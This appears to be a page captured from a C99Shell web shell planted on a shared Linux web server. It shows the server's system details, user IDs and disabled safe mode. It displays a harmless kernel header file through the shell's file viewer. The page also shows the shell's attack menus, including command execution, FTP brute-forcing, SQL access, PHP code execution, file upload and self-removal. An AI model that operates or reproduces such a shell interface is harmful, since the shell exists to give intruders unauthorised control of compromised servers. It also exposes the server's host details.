!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.3.27 

uname -a: Linux pdx1-shared-a4-04 6.6.104-grsec-jammy+ #3 SMP Tue Sep 16 00:28:11 UTC 2025 x86_64 

uid=6659440(dh_z2jmpm) gid=2086089(pg10499364) groups=2086089(pg10499364)  

Safe-mode: OFF (not secure)

/usr/src/linux-hwe-6.5-headers-6.5.0-45/arch/mips/include/uapi/asm/   drwxr-xr-x
Free 670.73 GB of 879.6 GB (76.25%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     sembuf.h (1.05 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
/* SPDX-License-Identifier: GPL-2.0 WITH Linux-syscall-note */
#ifndef _ASM_SEMBUF_H
#define _ASM_SEMBUF_H

#include <asm/ipcbuf.h>

/*
 * The semid64_ds structure for the MIPS architecture.
 * Note extra padding because this structure is passed back and forth
 * between kernel and user space.
 *
 * Pad space is left for 2 miscellaneous 64-bit values on mips64,
 * but used for the upper 32 bit of the time values on mips32.
 */

#ifdef __mips64
struct semid64_ds {
    struct ipc64_perm sem_perm;        /* permissions .. see ipc.h */
    long         sem_otime;        /* last semop time */
    long         sem_ctime;        /* last change time */
    unsigned long    sem_nsems;        /* no. of semaphores in array */
    unsigned long    __unused1;
    unsigned long    __unused2;
};
#else
struct semid64_ds {
    struct ipc64_perm sem_perm;        /* permissions .. see ipc.h */
    unsigned long   sem_otime;        /* last semop time */
    unsigned long   sem_ctime;        /* last change time */
    unsigned long    sem_nsems;        /* no. of semaphores in array */
    unsigned long    sem_otime_high;
    unsigned long    sem_ctime_high;
};
#endif

#endif /* _ASM_SEMBUF_H */

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0144 ]--